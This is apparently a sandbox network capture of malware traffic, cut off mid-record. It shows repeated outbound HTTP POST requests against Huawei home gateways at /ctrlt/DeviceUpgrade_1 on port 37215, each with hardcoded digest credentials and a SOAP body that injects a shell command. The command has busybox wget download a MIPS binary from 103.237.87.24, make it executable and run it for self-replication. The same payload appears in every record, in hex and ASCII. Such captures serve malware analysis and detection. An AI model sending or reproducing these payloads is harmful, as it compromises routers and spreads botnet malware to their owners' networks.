                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1403192.168.2.1340744157.12.155.17737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482381105 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1404192.168.2.1350034157.191.116.22237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482589960 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1405192.168.2.136013241.15.154.13637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482590914 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1406192.168.2.1336704197.164.218.17337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482599974 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1407192.168.2.135625672.107.248.9737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482610941 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1408192.168.2.1339460157.14.0.2337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482713938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1409192.168.2.134823441.145.178.2037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482726097 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1410192.168.2.133493441.74.167.537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482800007 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1411192.168.2.1357742157.125.154.24837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482808113 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1412192.168.2.133707441.51.213.18137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482814074 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
